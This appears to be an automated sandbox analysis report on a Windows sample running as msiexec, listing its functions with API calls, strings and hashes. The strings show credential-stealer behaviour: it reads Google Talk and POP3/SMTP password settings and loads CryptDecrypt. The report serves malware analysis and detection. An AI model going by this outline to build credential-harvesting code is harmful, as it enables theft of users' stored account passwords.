                                                              Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 321 40ba74 314->321 322 40ba6f-40ba72 314->322 315->308 315->309 316 40baa0-40bab3 call 407e30 323 40bab5-40bac1 316->323 324 40bafa-40bb09 SetCursor 316->324 325 40ba75-40ba76 call 40b5e5 321->325 322->325 326 40bac3-40bace 323->326 327 40bad8-40baf7 qsort 323->327 325->315 326->327 327->324 331->316 332->316 333->316 334->316
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Cursor_mbsicmpqsort
                                                              • String ID: /nosort$/sort
                                                              • API String ID: 882979914-1578091866
                                                              • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                              • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                              • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                              • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                              Function 00410DBB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 348 410dbb-410dd2 call 410d0e 351 410dd4-410ddd call 4070ae 348->351 352 410dfd-410e1b memset 348->352 361 410ddf-410de2 351->361 362 410dee-410df1 351->362 353 410e27-410e35 352->353 354 410e1d-410e20 352->354 357 410e45-410e4f call 410a9c 353->357 354->353 356 410e22-410e25 354->356 356->353 359 410e37-410e40 356->359 366 410e51-410e76 call 410d3d call 410add 357->366 367 410e7f-410e92 _mbscpy 357->367 359->357 361->352 364 410de4-410de7 361->364 365 410df8 362->365 364->352 368 410de9-410dec 364->368 369 410e95-410e97 365->369 366->367 367->369 368->352 368->362
                                                              APIs
                                                                • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                              • memset.MSVCRT ref: 00410E10
                                                              • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$`{g
                                                              • API String ID: 119022999-3561933272
                                                              • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                              • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                              • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                              • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                              Function 004085D2 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 79COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 374 4085d2-408605 call 44b090 call 4082cd call 410a9c 381 4086d8-4086dd 374->381 382 40860b-40863d memset call 410b62 374->382 385 4086c7-4086cc 382->385 386 408642-40865a call 410a9c 385->386 387 4086d2 385->387 390 4086b1-4086c2 call 410b62 386->390 391 40865c-4086ab memset call 410add call 40848b 386->391 387->381 390->385 391->390
                                                              APIs
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                              • memset.MSVCRT ref: 00408620
                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                              • memset.MSVCRT ref: 00408671
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                              • String ID: Software\Google\Google Talk\Accounts$`{g
                                                              • API String ID: 3996936265-3112142944
                                                              • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                              • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                              • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                              • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                              Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 004109F7
                                                                • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                              • memset.MSVCRT ref: 00410A32
                                                              • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                              • String ID:
                                                              • API String ID: 3143880245-0
                                                              • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                              • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                              • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                              • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                              Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 407 44b33b-44b342 408 44b344-44b34a ??3@YAXPAX@Z 407->408 409 44b34b-44b352 407->409 408->409 410 44b354-44b35a ??3@YAXPAX@Z 409->410 411 44b35b-44b362 409->411 410->411 412 44b364-44b36a ??3@YAXPAX@Z 411->412 413 44b36b-44b372 411->413 412->413 414 44b374-44b37a ??3@YAXPAX@Z 413->414 415 44b37b 413->415 414->415
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                              • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                              • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                              • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                              Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 416 40ce70-40cea1 call 4023b2 call 401e69 421 40cea3-40cea6 416->421 422 40ceb8 416->422 423 40ceb2 421->423 424 40cea8-40ceb0 421->424 425 40cebd-40cecc _strcmpi 422->425 426 40ceb4-40ceb6 423->426 424->426 427 40ced3-40cedc call 40cdda 425->427 428 40cece-40ced1 425->428 426->425 429 40cede-40cef7 call 40c3d0 call 40ba28 427->429 434 40cf3f-40cf43 427->434 428->429 437 40cef9-40cefd 429->437 438 40cf0e 429->438 439 40cf0a-40cf0c 437->439 440 40ceff-40cf08 437->440 441 40cf13-40cf30 call 40affa 438->441 439->441 440->441 443 40cf35-40cf3a call 40c580 441->443 443->434
                                                              APIs
                                                                • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                              • _strcmpi.MSVCRT ref: 0040CEC3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strlen$_strcmpimemset
                                                              • String ID: /stext
                                                              • API String ID: 520177685-3817206916
                                                              • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                              • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                              • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                              • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                              Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 445 404734-40474a call 404785 LoadLibraryA 448 40474c-404762 GetProcAddress 445->448 449 40476e-404778 445->449 448->449 452 404764 448->452 450 404781-404784 449->450 451 40477a-40477c call 404785 449->451 451->450 452->449
                                                              APIs
                                                                • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                              • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProc
                                                              • String ID:
                                                              • API String ID: 145871493-0
                                                              • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                              • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                              • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                              • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                              Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$StringWrite_itoamemset
                                                              • String ID:
                                                              • API String ID: 4165544737-0
                                                              • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                              • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                              • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                              • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                              Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                              • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                              • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                              • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                              Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                              • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                              • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                              • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                              Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                              • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                              • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                              • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                              Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CloseFind
                                                              • String ID:
                                                              • API String ID: 1863332320-0
                                                              • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                              • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                              • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                              • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                              Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                              • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                              • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                              • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                                              Non-executed Functions

                                                              Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                              • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                              • API String ID: 2238633743-192783356
                                                              • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                              • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                              • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                              • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                              Function 00406DFC Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EmptyClipboard.USER32 ref: 00406E06
                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                              • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                              • GlobalLock.KERNEL32(00000000), ref: 00406E41
                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00406E63
                                                              • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                              • GetLastError.KERNEL32 ref: 00406E74
                                                              • CloseHandle.KERNEL32(?), ref: 00406E80
                                                              • GetLastError.KERNEL32 ref: 00406E8B
                                                              • CloseClipboard.USER32 ref: 00406E94
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ClipboardGlobal$CloseErrorFileLast$AllocDataEmptyHandleLockReadSizeUnlock
                                                              • String ID:
                                                              • API String ID: 2624330674-0
                                                              • Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                              • Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
                                                              • Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                              • Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9
                                                              Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString_mbscmpstrlen
                                                              • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                              • API String ID: 3963849919-1658304561
                                                              • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                              • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                              • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                              • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                              Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@memcpymemset
                                                              • String ID: (yE$(yE$(yE
                                                              • API String ID: 1865533344-362086290
                                                              • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                              • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                              • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                              • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                              Function 00442D8E Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • strlen.MSVCRT ref: 004431AD
                                                              • strncmp.MSVCRT ref: 004431BD
                                                              • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                                              • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                              • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                              • API String ID: 1895597112-3210201812
                                                              • Opcode ID: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                              • Instruction ID: 70136e13f872b1b8ab9f6622f700308096b0d0b5c52b82b67a7483c56e51dea4
                                                              • Opcode Fuzzy Hash: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                              • Instruction Fuzzy Hash: 4AF10B718012589BDB22CF54C8487DEBBB4BB0278BF5485CAD8597B242C7B85B8DCF58
                                                              Function 00443C71 Relevance: 69.3, APIs: 23, Strings: 23, Instructions: 313stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
